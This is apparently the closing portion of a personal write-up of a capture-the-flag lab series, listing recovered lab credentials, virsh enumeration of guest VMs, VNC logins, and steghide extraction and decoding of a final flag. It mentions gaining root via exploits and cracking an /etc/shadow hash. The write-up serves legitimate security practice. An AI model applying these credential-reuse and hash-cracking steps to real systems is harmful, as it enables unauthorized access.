- - ssh-rsa password joshua (which was also given as a hint on the same server from which we got flag1)
- - root on eric,sandie and nleeson
- Todo:
- - vnc passwords on eric 5900 and 5901
- - decrypt nleeson's /etc/shadow password
- - Flag 2: It will include a final challenge to confirm you hit the jackpot.
- virsh # list
- Id Name State
- ----------------------------------------------------
- 2 puppet running
- 3 barringsbank running
- virsh # dominfo puppet
- Id: 2
- Name: puppet
- UUID: 3561f84c-71c3-f16f-4a7b-9097e7d2ac39
- OS Type: hvm
- State: running
- CPU(s): 1
- CPU time: 5244.9s
- Max memory: 1048576 KiB
- Used memory: 1048576 KiB
- Persistent: yes
- Autostart: enable
- Managed save: no
- Security model: apparmor
- Security DOI: 0
- Security label: libvirt-3561f84c-71c3-f16f-4a7b-9097e7d2ac39 (enforcing)
- virsh # dominfo barringsbank
- Id: 3
- Name: barringsbank
- UUID: 6cf27edd-7559-d6eb-1502-d3135c807785
- OS Type: hvm
- State: running
- CPU(s): 1
- CPU time: 3738.7s
- Max memory: 1048576 KiB
- Used memory: 1048576 KiB
- Persistent: yes
- Autostart: enable
- Managed save: no
- Security model: apparmor
- Security DOI: 0
- Security label: libvirt-6cf27edd-7559-d6eb-1502-d3135c807785 (enforcing)
- virsh #
- dumpxml puppet
- <domain type='qemu' id='2'>
- <name>puppet</name>
- <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
- <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
- vncviewer 127.0.0.1:5900
- password sendyoubacktowalker
- virsh # dumpxml barringsbank
- <domain type='qemu' id='3'>
- <name>barringsbank</name>
- <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
- <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
- vncviewer 127.0.0.1:5901
- password memphistennessee...
- (but David Lightman was from Seattle, Washington??)
- With that, we've completed the challenges!
- so far I have:
- - Troll Flag - flag.txt
- - Flag1.txt.0xff, which gave us the hint for the password "secret" to decode the gpg file
- > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
- - ssh-rsa password joshua (which was also given as a hint on the same server from which we got flag1)
- - root on eric, sandie and nleeson via exploits/password discovery
- - vncviewer 127.0.0.1:5901 / password memphistennessee...
- - vncviewer 127.0.0.1:5900 / password sendyoubacktowalker
- - have access to the bank server over VNC, but don't know the root password or the user(s) passwords from the login prompt,
- although we have the ssh-rsa key, so we can ssh into it as nleeson with password joshua using the decoded rsa key
- As of now, I don't know what else there could be to do other than cracking /etc/shadow for nleeson, which isn't needed to gain root on the bank server.
- Definitely feel like I missed something, but I had a lot of fun working my way through this CTF.
- Spoke with the OP on Twitter, who gave me a hint for this one. Inspecting the images, we find a hidden message in me.jpg.
- root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
- "me.jpg":
- format: jpeg
- capacity: 11.9 KB
- Try to get information about embedded data ? (y/n) y
- Enter passphrase:
- steghide: could not extract any data with that passphrase!
- root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
- "me.jpg":
- format: jpeg
- capacity: 11.9 KB
- Try to get information about embedded data ? (y/n) y
- Enter passphrase:
- embedded file "primate_egyptian_flag.txt":
- size: 3.7 KB
- encrypted: rijndael-128, cbc
- compressed: yes
- root@kali:~/HDD2/ctf/analouge-pond#
- steghide --extract -sf me.jpg
- Enter passphrase: reticulatingsplines
- wrote extracted data to "primate_egyptian_flag.txt".
- root@kali:~/HDD2/ctf/analouge-pond#
- cat primate_egyptian_flag.txt | xxd -r -p | rev | base64 -d
- Here's a fender bass for you...
- ,-. _.---._
- | `\.__.-'' `.
- \ _ _ ,. \
- ,+++=._________________)_||______|_|_|| |
- (_.ooo.===================||======|=|=|| |
- ~~' | ~' `~' o o /
- \ /~`\ o o /
- `~' `-.____.-'
- Congratulations to you once again and for the sixth time on capturing this
- flag!
- I've tried to mix things up a bit here, to move away from throw metasploit
- and web exploits at things. I hope you have enjoyed that portion and your
- feedback on this aspect would be appreciated.
- Of note, these VMs are set to do automatic security updates using puppet,
- so this ought to keep things dynamic enough for people.
- Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.
- A special thank you to g0tmi1k for hosting all these challenges and the
- valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
- me on IRC or twitter if you are looking for a hint or have completed the
- challenge.
- Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
- The North (C) BBC 1995.. What's the connection....?
- --Knightmare
- Awesome!
- https://www.youtube.com/watch?v=ChwPpktNqe0
- New Orleans, Baton Rouge and The Rising Sun
- Also the commonality of "war"?
- :)